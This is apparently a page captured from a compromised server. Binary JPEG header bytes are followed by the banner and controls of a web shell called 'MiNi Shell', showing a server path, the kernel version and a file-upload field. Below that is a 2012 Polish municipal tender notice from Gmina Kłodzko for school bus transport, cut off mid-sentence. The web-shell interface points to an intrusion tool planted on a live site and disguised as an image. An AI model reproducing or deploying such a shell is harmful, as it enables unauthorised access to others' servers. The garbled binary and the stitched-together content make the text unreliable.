JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120813/174549-N-2012.html

<p class="kh_header"><b>Kłodzko: Dowóz uczniów do jednostek oświatowych w roku szkolnym 2012/2013 - II przetarg</b><br>
<b>Numer ogłoszenia: 174549 - 2012; data zamieszczenia: 13.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kłodzko , ul. Okrzei 8a, 57-300 Kłodzko, woj. dolnośląskie, tel. 074 6474100, faks 074 6474103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.klodzko.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do jednostek oświatowych w roku szkolnym 2012/2013 - II przetarg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

ZADANIE I - dowóz i odwóz uczniów zamieszkałych na terenie Gminy Kłodzko                 
do jednostek oświatowych Gminy Kłodzko

	1. Dowóz i odwóz uczniów do Szkoły Podstawowej im. Stanisława Mikołajczyka 
w Jaszkowej Dolnej z miejscowości: Wojciechowice;
	2. Dowóz uczniów do Szkoły Podstawowej im. Stanisława Mikołajczyka w Jaszkowej z miejscowości: Droszków, Jaszkowa Górna;
3. Dowóz i odwóz uczniów do Szkoły Podstawowej im. gen. Władysława Sikorskiego w Ołdrzychowicach Kłodzkich oraz do Przedszkola Gminnego w Ołdrzychowicach Kłodzkich z miejscowości: Piotrowice, Romanowo, Rogówek, Ołdrzychowice Kłodzkie 
( droga do ze szkoły do domu przekracza 3 km ) oraz dowóz uczniów do Gimnazjum Publicznego im. Wł. St. Reymonta w Kłodzku z miejscowości: Romanowo,  Rogówek, Ołdrzychowice Kłodzkie,  Marcinów, Żelazno, Jaszkowa Dolna - k. Grochówki ( kurs łączony );
	4. Dowóz i odwóz uczniów do Szkoły Integracyjnej w Szalejowie Górnym oraz Przedszkola Gminnego w Szalejowie Dolnym z miejscowości: Gołogłowy, Bierkowice, Korytów, Ruszowice, Kamieniec, Piszkowice;
5. Dowóz i odwóz uczniów do Szkoły Integracyjnej w Szalejowie Górnym, Przedszkola Gminnego w Szalejowie Dolnym z miejscowości Stary Wielisław, Szalejów Dolny oraz dowóz uczniów do Gimnazjum Publicznego im. WŁ. St. Reymonta w Kłodzku 
z miejscowości Szalejów Górny i Dolny ( kurs łączony ); 
	6. Dowóz i odwóz uczniów do Zespołu Szkół w Wojborzu z miejscowości: Ścinawica, Młynów, Łączna oraz dowóz i odwóz do Przedszkola Gminnego z Oddziałami Integracyjnymi w Bierkowicach z miejscowości Łączna; ( kurs łączony ); 
	7. Dowóz i odwóz uczniów do Zespołu Szkół w Wojborzu z miejscowości: Gołogłowy, Piszkowice, Bierkowice, oraz dowóz do  Przedszkola Gminnego z Oddziałami Integracyjnymi w Bierkowicach z miejscowości: Kłodzko ul. Korczaka, Ruszowice, Piszkowice  ( kurs łączony );
8. Odwóz uczniów z Przedszkola Gminnego z Oddziałami Integracyjnymi 
w Bierkowicach do miejscowości: Morzyszów, Ruszowice, Piszkowice, Kłodzko ul. Korczaka.
9. Dowóz i odwóz uczniów do zespołu Szkół w Wojborzu z miejscowości: Ławica, Podtynie, Morzyszów, Wilcza oraz dowóz uczniów do Przedszkola Gminnego z Oddziałami Integracyjnymi w Bierkowicach z miejscowości Morzyszów.

	

	
Charakterystykę powyższych zadań stanowi załącznik nr 1 do opisu przedmiotu zamówienia.
 
Rozpoczęcie zajęć lekcyjnych w w/w jednostkach oświatowych o godz. 8:00  , zakończenie  zajęć lekcyjnych: około 13 25 w szkole podstawowej, 
				      około 14 30 w gimnazjum.
                                                     około 15 30  - 16 w przedszkolu

 UWAGA: 	uczniowie wsiadają rano najwcześniej o godzinie 7.00
		uczniów należy dowieźć do w/w jednostek do godz. 7 45, 
	odwóz uczniów po zajęciach lekcyjnych około godz. 14 30 i 15 30


¨Wykonawca zobowiązany jest wykonać przedmiot umowy z wykorzystaniem własnych środków transportowych odpowiadających wymogom określonym w ustawie o transporcie drogowym. Usługi objęte zamówieniem mają być świadczone środkami transportu przystosowanymi do przewozu uczniów, spełniającymi wszystkie wymogi bezpieczeństwa 
i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług. Wykonawca powinien zapewnić odpowiednią liczbę miejsc siedzących do wymagań danej trasy. W przypadku awarii środka transportowego Wykonawca zapewni zastępczy środek transportu, w taki sposób, aby nie powodować opóźnień czasowych kursu. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo przewożonych uczniów, 
w tym sprawuje opiekę nad uczniami w czasie przewozu. Opieka sprawowana jest przez opiekunów ( nie kierowcę ), którzy posiadają jednolite stroje z napisem  OPIEKUN . Do obowiązków opiekunów należy także pomoc przy wsiadaniu i wysiadaniu z pojazdu.  Wykonawca musi zapewnić przewożonym uczniom odpowiednie warunki bezpieczeństwa 
i higieny tj.: utrzymywać w czystości i porządku pojazdy, przestrzegać przepisów P.Poż. 
i BHP, ubezpieczyć pojazdy na czas przewozu z tytułu szkody, które mogą wyniknąć 
w związku z wykonywaniem zamówienia, oznaczyć pojazd na czas przewozu wykorzystywany do transportu dzieci szkolnych. Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. Wymagana jest należyta staranność przy realizacji zobowiązań. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.  
Zamawiający zastrzega, że liczba dowożonych uczniów w trakcie roku szkolnego może ulec zmianie, a Wykonawca zobowiązany jest na tę okoliczność do zapewnienia środka transportu z odpowiednią liczbą miejsc w ramach tej samej ceny brutto za kilometr. 
Dopuszcza się możliwość udzielenia zamówień uzupełniających do 20 % wartości  zamówienia podstawowego w sytuacjach wynikłych z organizacji roku szkolnego.    

Dowóz obejmuje okres od dnia 1 września 2012 r. do końca zajęć dydaktyczno wychowawczych w roku szkolnym 2012/2013.



ZADANIE II - dowóz i odwóz uczniów  zamieszkałych na terenie Gminy Kłodzko do jednostek oświatowych Gminy Kłodzko oraz uczniów niepełnosprawnych zamieszkałych na terenie Gminy Kłodzko do Niepublicznej Szkoły Podstawowej Specjalnej przy Domu Pomocy Społecznej dla Dzieci w Ludwikowicach Kłodzkich

Charakterystykę powyższych zadań stanowi załącznik nr 1 do opisu przedmiotu zamówienia.
 

 UWAGA: 	uczniowie wsiadają rano najwcześniej o godzinie 7.00
		 


Wykonawca zobowiązany jest wykonać przedmiot umowy z wykorzystaniem własnych środków transportowych odpowiadających wymogom określonym w ustawie o transporcie drogowym. Usługi objęte zamówieniem mają być świadczone środkami transportu przystosowanymi do przewozu uczniów, spełniającymi wszystkie wymogi bezpieczeństwa 
i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług. Wykonawca powinien zapewnić odpowiednią liczbę miejsc siedzących do wymagań danej trasy. W przypadku awarii środka transportowego Wykonawca zapewni zastępczy środek transportu, w taki sposób, aby nie powodować opóźnień czasowych kursu. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo przewożonych uczniów, 
w tym sprawuje opiekę nad uczniami w czasie przewozu. Opieka sprawowana jest przez opiekunów ( nie kierowcę ), którzy posiadają jednolite stroje z napisem  OPIEKUN . 
Do obowiązków opiekunów należy także pomoc przy wsiadaniu i wysiadaniu z pojazdu.  Wykonawca musi zapewnić przewożonym uczniom odpowiednie warunki bezpieczeństwa 
i higieny tj.: utrzymywać w czystości i porządku pojazdy, przestrzegać przepisów P.Poż. 
i BHP, ubezpieczyć pojazdy na czas przewozu z tytułu szkody, które mogą wyniknąć 
w związku z wykonywaniem zamówienia, oznaczyć pojazd na czas przewozu wykorzystywany do transportu dzieci szkolnych. Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. Wymagana jest należyta staranność przy realizacji zobowiązań. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.  
Zamawiający zastrzega, że liczba dowożonych uczniów w trakcie roku szkolnego może ulec zmianie, a Wykonawca zobowiązany jest na tę okoliczność do zapewnienia środka transportu z odpowiednią liczbą miejsc w ramach tej samej ceny brutto za kilometr. .    
Dopuszcza się możliwość udzielenia zamówień uzupełniających do 20 % wartości  zamówienia podstawowego w sytuacjach wynikłych z organizacji roku szkolnego.

Dowóz obejmuje okres od dnia 1 września 2012 r. do końca zajęć dydaktyczno wychowawczych w roku szkolnym 2012/2013..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dopuszcza się możliwość udzielenia zamówień uzupełniających do 20 % wartości  zamówienia podstawowego w sytuacjach wynikłych z organizacji roku szkolnego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.14.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie nr 1 - 5000 zł. słwonie: pięć tysięcy zł.
Zadanie nr 2 - Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie co najmniej 2 usług w zakresie objętym przedmiotem zamówienia o wartości co najmniej równej 50% ceny oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że dysponuje  osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy.
Zgodnie z art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość zmiany zawartej umowy 
w stosunku do treści oferty, na podstawie której dokonany będzie wybór wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej: 
1) jeżeli Zamawiający dokonał zmiany sposobu wykonania części przedmiotu umowy, czego nie można było przewidzieć, ani też nie wynikało to z potrzeby wykonywania zamówienia i nie można było tego przewidzieć przed zawarciem umowy, 
2) jeżeli wystąpi konieczność wykonania zamówień uzupełniających, 
3) jeżeli warunki atmosferyczne nie pozwolą na wykonywanie części przedmiotu umowy lub wystąpią uzasadnione przypadki nieprzewidzianych warunków realizacji przedmiotu umowy,
4) jeżeli zmianie ulegnie urzędowa stawka VAT, 
5) na skutek siły wyższej zajdzie konieczność zmiany terminu wykonania zamówienia.
6) jeżeli będzie ona z jakichkolwiek przyczyn korzystna dla Zamawiającego.
Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gmina.klodzko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kłodzko ul. Okrzei 8a pokój 408.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2012 godzina 10:00, miejsce: Urząd Gminy Kłodzko ul. Okrzei 8a pokój 207 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowóz i odwóz uczniów zamieszkałych na terenie Gminy Kłodzkodo jednostek oświatowych Gminy Kłodzko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Dowóz i odwóz uczniów do Szkoły Podstawowej im. Stanisława Mikołajczyka 
w Jaszkowej Dolnej z miejscowości: Wojciechowice;
	2. Dowóz uczniów do Szkoły Podstawowej im. Stanisława Mikołajczyka w Jaszkowej z miejscowości: Droszków, Jaszkowa Górna;
3. Dowóz i odwóz uczniów do Szkoły Podstawowej im. gen. Władysława Sikorskiego w Ołdrzychowicach Kłodzkich oraz do Przedszkola Gminnego w Ołdrzychowicach Kłodzkich z miejscowości: Piotrowice, Romanowo, Rogówek, Ołdrzychowice Kłodzkie 
( droga do ze szkoły do domu przekracza 3 km ) oraz dowóz uczniów do Gimnazjum Publicznego im. Wł. St. Reymonta w Kłodzku z miejscowości: Romanowo,  Rogówek, Ołdrzychowice Kłodzkie,  Marcinów, Żelazno, Jaszkowa Dolna - k. Grochówki ( kurs łączony );
	4. Dowóz i odwóz uczniów do Szkoły Integracyjnej w Szalejowie Górnym oraz Przedszkola Gminnego w Szalejowie Dolnym z miejscowości: Gołogłowy, Bierkowice, Korytów, Ruszowice, Kamieniec, Piszkowice;
5. Dowóz i odwóz uczniów do Szkoły Integracyjnej w Szalejowie Górnym, Przedszkola Gminnego w Szalejowie Dolnym z miejscowości Stary Wielisław, Szalejów Dolny oraz dowóz uczniów do Gimnazjum Publicznego im. WŁ. St. Reymonta w Kłodzku 
z miejscowości Szalejów Górny i Dolny ( kurs łączony ); 
	6. Dowóz i odwóz uczniów do Zespołu Szkół w Wojborzu z miejscowości: Ścinawica, Młynów, Łączna oraz dowóz i odwóz do Przedszkola Gminnego z Oddziałami Integracyjnymi w Bierkowicach z miejscowości Łączna; ( kurs łączony ); 
	7. Dowóz i odwóz uczniów do Zespołu Szkół w Wojborzu z miejscowości: Gołogłowy, Piszkowice, Bierkowice, oraz dowóz do  Przedszkola Gminnego z Oddziałami Integracyjnymi w Bierkowicach z miejscowości: Kłodzko ul. Korczaka, Ruszowice, Piszkowice  ( kurs łączony );
8. Odwóz uczniów z Przedszkola Gminnego z Oddziałami Integracyjnymi 
w Bierkowicach do miejscowości: Morzyszów, Ruszowice, Piszkowice, Kłodzko ul. Korczaka.
9. Dowóz i odwóz uczniów do zespołu Szkół w Wojborzu z miejscowości: Ławica, Podtynie, Morzyszów, Wilcza oraz dowóz uczniów do Przedszkola Gminnego z Oddziałami Integracyjnymi w Bierkowicach z miejscowości Morzyszów.

	

	
Charakterystykę powyższych zadań stanowi załącznik nr 1 do opisu przedmiotu zamówienia.
 
¨Rozpoczęcie zajęć lekcyjnych w w/w jednostkach oświatowych o godz. 800  ,
   zakończenie  zajęć lekcyjnych: około 13 25 w szkole podstawowej, 
				      około 14 30 w gimnazjum.
                                                     około 15 30  - 16 w przedszkolu

 UWAGA: 	uczniowie wsiadają rano najwcześniej o godzinie 7.00
		uczniów należy dowieźć do w/w jednostek do godz. 7 45, 
	odwóz uczniów po zajęciach lekcyjnych około godz. 14 30 i 15 30


Wykonawca zobowiązany jest wykonać przedmiot umowy z wykorzystaniem własnych środków transportowych odpowiadających wymogom określonym w ustawie o transporcie drogowym. Usługi objęte zamówieniem mają być świadczone środkami transportu przystosowanymi do przewozu uczniów, spełniającymi wszystkie wymogi bezpieczeństwa 
